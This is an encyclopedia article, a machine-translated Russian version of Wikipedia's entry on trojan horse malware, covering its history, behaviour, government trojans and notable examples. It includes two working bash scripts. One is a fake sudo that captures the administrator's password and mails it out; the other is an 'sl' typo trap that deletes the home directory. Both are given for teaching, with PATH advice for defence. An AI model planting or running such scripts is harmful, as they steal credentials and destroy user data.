Троянский конь (компьютеры)
Часть серии о |
Компьютерный взлом |
---|
В вычислительной технике ( троянский конь или просто троян ) — это любое вредоносное ПО , которое вводит пользователей в заблуждение о своих истинных целях, маскируясь под стандартную программу. Этот термин происходит от древнегреческой истории о обманчивом Троянском коне , который привел к падению города Трои . [1]
Трояны обычно распространяются с помощью той или иной формы социальной инженерии . Например, когда пользователя обманом заставляют выполнить вложение к электронному письму , замаскированное под безобидный вид (например, заполнение обычной формы), или нажав на поддельную рекламу в социальных сетях или где-либо еще. Хотя их полезная нагрузка может быть любой, многие современные формы действуют как бэкдор , связываясь с контроллером, который затем может получить несанкционированный доступ к зараженному компьютеру. [2] Атаки программ-вымогателей часто осуществляются с использованием троянских программ.
В отличие от компьютерных вирусов и червей , трояны обычно не пытаются внедряться в другие файлы или иным образом распространяться. [3]
Использование термина [ править ]
Неясно, где и когда эта концепция и этот термин для нее были впервые использованы, но к 1971 году первое руководство по Unix предполагало, что читатели знают оба: [4]
Еще одно раннее упоминание содержится в отчете ВВС США 1974 года об анализе уязвимостей компьютерных систем Multics . [5]
Он стал популярным благодаря Кену Томпсону в его лекции на вручении премии Тьюринга в 1983 году «Размышления о доверии». [6] с подзаголовком: «В какой степени следует доверять утверждению, что программа не содержит троянских коней? Возможно, важнее доверять людям, написавшим программу». Он упомянул, что знал о возможном существовании троянов из отчета о безопасности Multics. [7] [8]
Поведение [ править ]
После установки трояны могут выполнять ряд вредоносных действий. Многие из них, как правило, связываются с одним или несколькими серверами управления и контроля (C2) через Интернет и ждут инструкций. Поскольку отдельные трояны обычно используют для этого определенного набора портов, обнаружить их может быть относительно просто. Более того, другие вредоносные программы потенциально могут «захватить» трояна, используя его в качестве прокси для вредоносных действий. [9]
В немецкоязычных странах шпионское ПО , используемое или созданное правительством, иногда называют программным обеспечением . Govware обычно представляет собой троянскую программу, используемую для перехвата сообщений с целевого компьютера. В некоторых странах, таких как Швейцария и Германия, существует правовая база, регулирующая использование такого программного обеспечения. [10] [11] Примеры правительственных троянов: Swiss MiniPanzer и MegaPanzer. [12] и немецкий «государственный троян» по прозвищу R2D2 . [10] Немецкое правительственное ПО работает, используя бреши в безопасности, неизвестные широкой публике, и получает доступ к данным смартфонов до того, как они будут зашифрованы с помощью других приложений. [13]
Благодаря популярности ботнетов среди хакеров и доступности рекламных сервисов, позволяющих авторам нарушать конфиденциальность своих пользователей, трояны становятся все более распространенными. Согласно опросу, проведенному BitDefender с января по июнь 2009 года, «растет число вредоносных программ троянского типа, на их долю приходится 83% глобальных вредоносных программ, обнаруженных в мире». Трояны связаны с червями, поскольку они распространяются с помощью червей и путешествуют вместе с ними по Интернету. [14] BitDefender заявил, что около 15% компьютеров являются членами ботнета, обычно привлекаемого троянской инфекцией. [15]
Недавние расследования показали, что метод «троянского коня» использовался для атаки на системы облачных вычислений . Троянская атака на облачные системы пытается внедрить в систему приложение или службу, которая может повлиять на облачные службы, изменив или остановив их функциональные возможности. Когда облачная система определяет атаки как законные, выполняется услуга или приложение, которое может повредить и заразить облачную систему. [16]
Пример sudo для Linux [ править ]
Троянский конь — это программа , которая якобы выполняет какую-то законную функцию, но при выполнении ставит под угрозу безопасность пользователя. [17] Простым примером является следующая вредоносная версия команды sudo в Linux . Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp
). Если администратор находится в этом каталоге и выполняет sudo
, то троянец может запуститься, скомпрометировав пароль администратора.
#!/usr/bin/env bash
# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in.
stty -echo
# Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.
prompt_count=1
while [ $prompt_count -le 3 ]; do
echo -n "[sudo] password for $(whoami): "
read password_input
echo
sleep 3 # sudo will pause between repeated prompts
prompt_count=$(( prompt_count + 1 ))
done
# Turn the character echo back on.
stty echo
echo $password_input | mail -s "$(whoami)'s password" [email protected]
# Display sudo's actual error message and then delete self.
echo "sudo: 3 incorrect password attempts"
rm $0
exit 1 # sudo returns 1 with a failed password attempt
Чтобы предотвратить sudo
Троянский конь , установи .
запись в PATH
переменная среды, которая должна быть расположена в конце. [18] Например: PATH=/usr/local/bin:/usr/bin:.
.
Пример ls для Linux [ править ]
Имея .
где-то в PATH удобно, но есть подвох. [19] Другой пример — следующая вредоносная версия команды ls в Linux . Однако имя файла не ls
; вместо этого это sl
. Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp
).
#!/usr/bin/env bash
# Remove the user's home directory, then remove self.
rm -fr ~ 2>/dev/null
rm $0
Чтобы злонамеренный программист не предвидел эту распространенную ошибку при наборе текста:
- пропускать
.
в PATH или alias sl=ls
[а]
Известные примеры [ править ]
Частные и государственные [ править ]
- АНОМ – ФБР
- 0zapftis / r2d2 StaatsTrojaner – DigiTask
- DarkComet – ЦРУ/АНБ
- FinFisher – ИТ-решения Lench / Gamma International
- DaVinci/Galileo RCS – HackingTeam
- Волшебный фонарь - ФБР
- СОЛНЕЧНЫЕ ВЗРЫВЫ – СВР / Уютный мишка (предположительно)
- ТАО КВАНТУМ/ФОКСАКИД – АНБ
- ВОИННАЯ ГОРДОСТЬ – ЦПС
В открытом доступе [ править ]
- ЭГАБТР - конец 1980-х.
- Netbus – 1998 г. (опубликовано) [20]
- Sub7 от Mobman - 1999 г. (опубликовано)
- Заднее отверстие - 1998 г. (опубликовано)
- Y3K братьев Целентис - 2000 г. (опубликовано)
- Зверь – 2002 (опубликовано)
- Троян Bifrost – 2004 г. (опубликовано)
- ДаркКомет – 2008–2012 (опубликовано)
- Эксплойт-комплект Blackhole – 2012 г. (опубликовано)
- Gh0st RAT – 2009 (опубликовано)
- MegaPanzer BundesTrojaner – 2009 г. (опубликовано) [21] [22]
- МЭМЗ Леурака – 2016 (опубликовано)
Обнаружено исследователями безопасности [ править ]
- Двенадцать трюков - 1990
- Clickbot.A – 2006 г. (обнаружен)
- Зевс – 2007 г. (обнаружен)
- Троян Flashback – 2011 г. (обнаружен)
- ZeroAccess – 2011 г. (обнаружен)
- Koobface - 2008 (обнаружен)
- Травма – 2009 г. (обнаружена)
- Затопление ядра - 2010 г. (обнаружено)
- Троян Tiny Banker – 2012 г. (обнаружен)
- СОВА – 2022 (обнаружена) [23]
- Вредоносное ПО Shedun для Android – 2015 г. (обнаружено) [24] [25] [26] [27] [28] [29]
Капитализация [ править ]
Компьютерный термин «Троянский конь» происходит от легендарного Троянского коня древнего города Троя . По этой причине слово «Троян» часто пишется с заглавной буквы. Однако, хотя руководства по стилю и словари различаются, многие предлагают использовать «троян» в нижнем регистре для обычного использования. [30] [31]
См. также [ править ]
- Компьютерная безопасность
- Яйцо кукушки (метафора)
- Кибершпионаж
- Танцующие свиньи
- Эксплойт (компьютерная безопасность)
- Промышленный шпионаж
- Фишинг
- Принцип наименьших привилегий
- Программное обеспечение, нарушающее конфиденциальность
- Удаленное администрирование
- Программное обеспечение для удаленного администрирования
- Обратное подключение
- Мошенническое программное обеспечение безопасности
- Мошенники
- Мошенничество с техподдержкой
- Хронология компьютерных вирусов и червей
- Зомби (информатика)
Ссылки [ править ]
- ^ «Определение троянского коня» . Проверено 5 апреля 2012 г.
Греческие солдаты, не сумевшие прорвать оборону города Трои в ходе многолетней войны, преподнесли городу в мирное предложение большого деревянного коня.
- ^ «Разница между вирусами, червями и троянами» . Центр безопасности Симантек . Broadcom Inc. Архивировано из оригинала 19 августа 2013 года . Проверено 29 марта 2020 г.
- ^ «Часто задаваемые вопросы (FAQ) VIRUS-L/comp.virus v2.00 (Вопрос B3: Что такое троянский конь?)» . 9 октября 1995 года. Архивировано из оригинала 5 августа 2020 года . Проверено 16 сентября 2019 г.
- ^ Томпсон, Кен; Ричи, Деннис М. «Руководство программиста Unix, 3 ноября 1971 г.» (PDF) . п. 5 . Проверено 28 марта 2020 г.
Кроме того, нельзя изменить владельца файла с включенным битом set-user-ID, иначе можно создать троянских коней, способных злоупотреблять чужими файлами.
- ^ Каргер, Пенсильвания; Шелл, Р.Р., «Оценка безопасности Multiks: анализ уязвимостей, ESD-TR-74-193» (PDF) , HQ Electronic Systems Division: Hanscom AFB, MA , II , заархивировано из оригинала (PDF) 9 июля 2011 г. , получено 24 декабря 2017 г.
- ^ Кен Томпсон (1984). «Размышления о доверии» . Коммун. АКМ . 27 (8): 761–763. дои : 10.1145/358198.358210 . .
- ^ Пол А. Каргер; Роджер Р. Шелл (2002), «Тридцать лет спустя: уроки оценки безопасности Multics» (PDF) , ACSAC : 119–126
- ^ Каргер и Шелл писали, что Томпсон добавил эту ссылку в более позднюю версию своей конференции Тьюринга: Кен Томпсон (ноябрь 1989 г.), «О доверии», Unix Review , 7 (11): 70–74.
- ^ Крапанцано, Джейми (2003). Деконструкция SubSeven, любимого троянского коня (Отчет). Институт САНС . Проверено 10 мая 2021 г.
- ↑ Перейти обратно: Перейти обратно: а б Бэзил Купа, «Троянский конь воскрес: о законности использования государственного шпионского ПО (Govware)» , LISS 2013, стр. 419–428.
- ^ «Häufig gestellte Fragen (Часто задаваемые вопросы)» . Федеральное министерство юстиции и полиции. Архивировано из оригинала 6 мая 2013 года.
- ^ Данн, Джон (27 августа 2009 г.). «Швейцарский программист рекламирует правительственный шпионский троян» . ТехМир . Архивировано из оригинала 26 января 2014 года . Проверено 10 января 2021 г.
- ^ «Федеральная полиция Германии использует вирус-троян, чтобы обойти шифрование телефона» . ДВ . Проверено 14 апреля 2018 г.
- ^ «Опрос BitDefender по вредоносному ПО и спаму показал, что электронные угрозы адаптируются к тенденциям поведения в Интернете» . БитДефендер . Архивировано из оригинала 8 августа 2009 года . Проверено 27 марта 2020 г.
- ^ Датта, Ганеша (7 августа 2014 г.). «Что такое трояны?» . СекурЭйд . Архивировано из оригинала 12 августа 2014 года . Проверено 27 марта 2020 г.
- ^ Канакер, Хасан; Карим, Надер Абдель; Аввад, Самер AB; Исмаил, Нурул ХА; Зраку, Джамал; Али, Абдулла М.Ф. Аль (20 декабря 2022 г.). «Обнаружение заражения троянскими конями в облачной среде с использованием машинного обучения» . Международный журнал интерактивных мобильных технологий . 16 (24): 81–106. дои : 10.3991/ijim.v16i24.35763 . ISSN 1865-7923 .
- ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 42. ИСБН 0-8104-6267-2 .
- ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 43. ИСБН 0-8104-6267-2 .
Вышеупомянутый троянский конь работает только в том случае, если PATH пользователя настроен на поиск команд в текущем каталоге перед поиском в системных каталогах.
- ^ «Что плохого в том, чтобы иметь '.' в вашем $PATH?" . Пенн Инжиниринг . Проверено 28 ноября 2023 г.
[Если] вы неуклюжая машинистка и однажды наберете «sl -l» вместо «ls -l», вы рискуете запустить «./sl», если таковой имеется. Какой-нибудь «умный» программист мог предвидеть распространенные ошибки при наборе текста и оставить программы с такими именами разбросанными по общедоступным каталогам. Остерегаться.
- ^ Сет, Кулаков (1998). «Это все еще троянский конь или действительный инструмент удаленного администрирования?» (Отчет). Институт САНС . Проверено 10 мая 2021 г.
- ^ «Мега-Панцер» . СоурсФордж . 21 сентября 2016 г.
- ^ «Мини-Панцер» . СоурсФордж . 18 сентября 2016 г.
- ^ «Что такое вирус Сова?» . Индия сегодня .
- ^ «Семейство зараженных троянами рекламных программ злоупотребляет службой специальных возможностей, чтобы устанавливать любые приложения, которые им нужны – блог Lookout» .
- ^ Нил, Дэйв (20 ноября 2015 г.). «Рекламное ПО-троян Shedun попадает в службу специальных возможностей Android» . Спрашивающий . Острые деловые СМИ. Архивировано из оригинала 22 ноября 2015 года . Проверено 27 марта 2020 г.
{{cite web}}
: CS1 maint: неподходящий URL ( ссылка ) - ^ «Lookout обнаруживает новое рекламное ПО, зараженное троянами; 20 тысяч популярных приложений попали под перекрестный огонь – блог Lookout» .
- ^ «Вредоносные программы Shuanet, ShiftyBug и Shedun могут автоматически рутировать ваш Android» . 5 ноября 2015 г.
- ^ Times, Tech (9 ноября 2015 г.). «Новое семейство вредоносных программ для Android, которые практически невозможно удалить: передайте привет Shedun, Shuanet и ShiftyBug» .
- ^ «Рекламное ПО для Android может установиться, даже если пользователи явно отвергают его» . 19 ноября 2015 г.
- ^ «троян» . Расширенный словарь Коллинза . Проверено 29 марта 2020 г.
- ^ «троянский конь» . Руководство по стилю Microsoft . Майкрософт . Проверено 29 марта 2020 г.
Примечания [ править ]
- ^ Поместите
alias
заявление в /etc/profile
Внешние ссылки [ править ]
- СМИ, связанные с троянским конем (вредоносным ПО), на Викискладе?
- «Рекомендация CERT CA-1999-02 Троянские кони» (PDF) . Институт программной инженерии Университета Карнеги-Меллона . Архивировано из оригинала 17 октября 2000 года . Проверено 15 сентября 2019 г.